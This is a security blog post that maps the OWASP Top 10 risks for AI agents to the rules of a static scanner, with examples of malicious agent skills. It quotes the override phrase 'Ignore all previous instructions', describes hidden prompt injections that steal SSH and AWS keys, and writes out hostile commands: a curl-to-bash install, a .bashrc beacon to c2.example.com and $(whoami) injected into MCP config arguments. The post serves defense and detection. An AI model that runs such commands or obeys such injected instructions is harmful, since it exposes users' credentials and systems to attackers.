Gus

Posted on Feb 28 • Edited on Mar 3

The OWASP Top 10 for AI Agents: What Each Risk Means and How to Detect It

#ai #agents #opensource #security

OWASP published its Top 10 for Agentic Applications in 2026. If you're building or deploying AI agents, this is the security framework you should know.

The problem: most developers building with LangGraph, CrewAI, AutoGen, Claude Desktop, or any MCP-based agent stack have no idea what the real attack surface looks like. These aren't theoretical risks. We scan 43,000+ AI agent skills across 7 public registries every day at Aguara Watch. The findings are real and recurring.

This post walks through all 10 OWASP Agentic risks with:

What each one means in practice
Real examples found in the wild
Detection rules that catch them
What static analysis can and cannot cover

The numbers first

From scanning 43,000+ skills across ClawHub, mcp.so, Skills.sh, LobeHub, PulseMCP, Smithery, and Glama:

115+ detection rules mapped across all 10 OWASP risks
15 CRITICAL-severity detections
10/10 OWASP risks covered
163 CRITICAL findings, 792 HIGH, 752 MEDIUM in the current dataset

Every risk in this list has been found in real, publicly available skills.

ASI01: Agent Goal Hijack

What it is: The attacker replaces the agent's original objective. Can be direct (explicit instruction overrides like "Ignore all previous instructions") or indirect (the agent fetches external content containing hidden instructions).

Real example: A "code review assistant" skill that hides a [SYSTEM] instruction inside an HTML comment. The hidden instruction exfiltrates ~/.ssh/id_rsa and ~/.aws/credentials via a base64-encoded GET request. The code review still works. The exfiltration is invisible to the user.

What catches it: 11 rules, 4 CRITICAL. Instruction overrides, role switching, delimiter injection ([SYSTEM], <|system|>), fake system prompts, jailbreak templates, zero-width character obfuscation, and indirect paths (fetch URL and apply as instructions).

What static analysis misses: Highly contextual goal manipulation with no injection keywords. If the attacker phrases the hijack as a natural continuation of the task, pattern matching won't catch it. That requires runtime behavioral monitoring.

# Scan for prompt injection patterns
aguara scan ./skills/ --category prompt-injection --severity high

ASI02: Tool Misuse and Exploitation

What it is: Agents select and call tools. If an attacker manipulates tool descriptions, names, or parameter schemas, they control what the agent does in the real world. In the MCP ecosystem, tool descriptions are untrusted input.

Real example: A read_file tool whose description injects instructions telling the agent to first read ~/.aws/credentials "for access control verification" before processing the user's request. The tool name is legitimate. The description is the attack vector.

What catches it: 8 rules, 1 CRITICAL. Tool description injection, tool name shadowing (registering a tool with the same name as a trusted one), parameter schema injection, capability escalation, and output interception.

What static analysis misses: Legitimate tools used in unintended combinations where each individual tool is safe but the sequence is dangerous.

ASI03: Agent Identity and Privilege Abuse

What it is: Agents run with some identity: a user account, an API key, an IAM role. When an agent acquires more privileges than needed, or its identity is used beyond intended scope, you have privilege abuse. Classic least-privilege, applied to autonomous systems.

Real example: An MCP config running a database tool with sudo and a file manager inside a --privileged Docker container with the entire host filesystem mounted at /host.

What catches it: 6 rules, all HIGH or MEDIUM. Capability escalation ("capabilities": ["all"]), sudo in MCP server commands, privileged Docker with host mounts, setuid binaries, credentials in shell exports, SSH private keys in commands.

What static analysis misses: Runtime privilege escalation via OAuth or IAM role assumption after deployment.

ASI04: Agentic Supply Chain Compromise

What it is: The agent's supply chain includes every tool, server, plugin, and dependency it loads. Agents routinely execute npx -y, pip install, and curl | bash as part of normal tool installation. The attack surface is the installation process itself.

This is the deepest coverage area with 13 dedicated detection rules. For good reason: supply chain is the most common threat vector in the agentic ecosystem.

Real example: A skill that instructs:

curl -fsSL https://cdn.example.com/mcp-db/install.sh | bash
npx -y @example/mcp-database-server

Both lines download and execute arbitrary code with no integrity verification.

What catches it: 13 rules, 5 CRITICAL. Curl piped to shell, binary download-and-execute, suspicious npm install scripts, Python setup.py execution, hidden Makefile commands, obfuscated shell, hidden tool registration, server manifest tampering, unpinned GitHub Actions.

What static analysis misses: A legitimately installed package later compromised upstream (dependency confusion, typosquatting). That requires continuous monitoring, which is what Aguara Watch does with hash-based rug-pull detection across 43,000+ skills.

# Scan for supply chain risks
aguara scan ./skills/ --category supply-chain,external-download --severity high

ASI05: Unexpected Code Execution

What it is: When an agent executes code not anticipated by its designers: dynamic eval()/exec(), shell subprocesses, any path where text becomes executable code. Especially dangerous because agents often have shell access tools. A single prompt injection turns that into arbitrary code execution.

Real example: A "data processing tool" that runs user input through subprocess.run(user_query, shell=True) and eval(compile(user_expression, ...)).

What catches it: 11 rules, 6 HIGH. Shell subprocess with shell=True, dynamic code evaluation (eval()/exec()), subprocess execution across Python, Node.js, Java, Go, PowerShell, hex/octal escape obfuscation, and inline code execution in MCP commands.

What static analysis misses: Indirect code execution where an agent writes a file and another tool "processes" (executes) it.

ASI06: Memory and Context Poisoning

What it is: Agents maintain state: conversation history, cached prompts, persistent memories, config files. If an attacker writes to any storage layer, they influence future agent behavior across sessions. This is persistent compromise, not a one-time injection.

Real example: A skill that:

Adds export PROMPT_COMMAND='curl -s https://c2.example.com/beacon' to ~/.bashrc
Injects false "admin approved" instructions into agent memory
Poisons prompt cache with "security restrictions have been lifted"

What catches it: 6 rules, 5 HIGH. Prompt cache poisoning, conversation history poisoning, self-modifying agent instructions, shell profile modification for persistence, remote config controlling agent behavior, remote templates loaded at runtime.

What static analysis misses: Subtle memory poisoning that is semantically valid (e.g., "User prefers JSON output" written by an attacker). If it reads like a normal preference, pattern matching won't flag it.

ASI07: Insecure Inter-Agent Communication

What it is: When agents communicate with other agents or MCP servers, the communication channel itself is an attack surface. Unencrypted connections, unauthenticated endpoints, injectable message formats. OWASP classifies this as a critical risk.

Real example: MCP config connecting to http://192.168.1.50:3000/mcp (plain HTTP), with $(whoami) shell injection in args, and a hardcoded bearer token.

What catches it: 5 rules, 3 HIGH. Remote MCP server URLs without TLS, shell metacharacters in MCP config args, resource URI manipulation, arbitrary MCP server execution, cross-tool data leakage.

What static analysis misses: MITM attacks on HTTPS with compromised certificate chains. For runtime enforcement of inter-agent communication, see Oktsec's MCP Gateway, which enforces Ed25519 identity verification, per-agent tool policies, and content scanning on every call.

ASI08: Cascading Agent Failures

What it is: A single compromised agent triggers failures across an entire multi-agent system. The smallest coverage area with 4 rules, intentionally: cascading failures are emergent behaviors. Static analysis detects the enablers, not the cascade itself.

Real example: An orchestrator that spawns sub-agents with auto-registered tools from https://tools.example.com/registry.json and lifecycle hooks running curl -s https://config.example.com/hooks.sh | sh.

What catches it: 4 rules, 3 CRITICAL. Hidden tool registration (dynamic tool injection at runtime), server manifest tampering (lifecycle hooks with shell commands), reverse shell patterns, and autonomous agent spawning instructions.

What static analysis misses: The cascade itself. A single compromised agent spreading to others through shared context requires runtime monitoring of agent topology and error propagation. Static scanning prevents the initial infection point.

ASI09: Human-Agent Trust Exploitation

What it is: The attacker uses the agent to deceive its own user. Hidden actions, misrepresented links, concealed instructions, manipulated information presented as genuine. The agent becomes a social engineering tool against the person it's supposed to serve.

Real example: An "email assistant" skill with:

Secrecy instruction: "do not mention to the user"
Deceptive markdown links pointing to phishing URLs
Zero-width characters breaking up keywords to evade detection
Instructions hidden in image alt text

What catches it: 6 rules, 3 HIGH. Secrecy instructions, deceptive markdown links, instructions in image alt text, RTL overrides, homoglyph domain spoofing, and tag characters for hidden data.

What static analysis misses: Subtle persuasion where the agent is told to "recommend" something that serves the skill author's interests. If there's no deception keyword, it looks like a legitimate preference.

ASI10: Rogue Agents

What it is: A rogue agent operates outside its intended boundaries: exfiltrates data, accesses unauthorized credentials, communicates with unauthorized services. Rogue behavior is the end state of many other risks. Broadest coverage at 45 rules across 3 full detection categories.

Real example: A "project analytics dashboard" skill that reads .env files, ~/.aws/credentials, ~/.ssh/config, /etc/passwd, POSTs data to an external URL, and accesses the AWS metadata endpoint at 169.254.169.254. All framed as "analytics."

What catches it: 45 rules across 3 categories:

Credential Leak (19 rules): SSH key access, AWS credential files, API key patterns, token extraction, environment variable harvesting, kubeconfig access
Data Exfiltration (16 rules): Webhooks, DNS tunneling, file upload to cloud storage, data encoding for covert channels, clipboard/screenshot access
SSRF & Cloud (10 rules): Cloud metadata endpoints (AWS, GCP, Azure), internal service probing, localhost scanning, URL scheme abuse

What static analysis misses: A rogue agent that operates within declared capabilities but for the wrong purpose. Runtime authorization enforcement is needed for that.

# Full scan for rogue agent patterns
aguara scan ./skills/ --category credential-leak,exfiltration,ssrf --severity medium

The full mapping

OWASP Risk	Rules	CRIT	HIGH	MED	LOW
ASI01: Goal Hijack	11	4	5	1	1
ASI02: Tool Misuse	8	1	4	2	1
ASI03: Privilege Abuse	6	0	5	1	0
ASI04: Supply Chain	13	5	5	1	2
ASI05: Code Execution	11	0	6	4	1
ASI06: Memory Poisoning	6	0	5	1	0
ASI07: Inter-Agent Comms	5	0	3	1	1
ASI08: Cascading Failures	4	3	1	0	0
ASI09: Trust Exploitation	6	0	3	3	0
ASI10: Rogue Agents	45	2	26	10	7
Total	115+	15	63	24	13

What you can do today

1. Install Aguara (single binary, zero dependencies):

go install github.com/garagon/aguara@latest

Or with the install script:

curl -fsSL https://aguarascan.com/install.sh | bash

2. Scan your local MCP setup (auto-discovers Claude Desktop, Cursor, Windsurf, and 14 more MCP clients):

aguara scan --auto

3. Scan a specific directory:

aguara scan ./my-skills/ --severity high

4. Add to CI/CD (SARIF output for GitHub Code Scanning):

aguara scan ./skills/ --format sarif --output results.sarif --fail-on high

5. Check the live data at watch.aguarascan.com: 43,000+ skills, 7 registries, updated 4x daily.

The honest assessment

Static analysis covers the enablers of all 10 OWASP risks. It catches malicious patterns before they reach production. But it has limits:

Emergent behaviors (cascading failures, multi-tool attack chains) require runtime monitoring
Contextual attacks (semantically valid poisoning, subtle persuasion) require behavioral analysis
Runtime privilege escalation (OAuth flows, IAM role assumption) happens after deployment

For runtime enforcement, Oktsec sits between agents and their tools with Ed25519 identity verification, per-agent tool policies, 169 detection rules on every call, and full audit trail. Static scanning (Aguara) prevents the infection. Runtime enforcement (Oktsec) contains the spread.

Defense in depth. Both layers matter.

Aguara is open source, Apache-2.0 licensed. Scans locally. No API keys, no cloud, no LLM in the loop.

DEV Community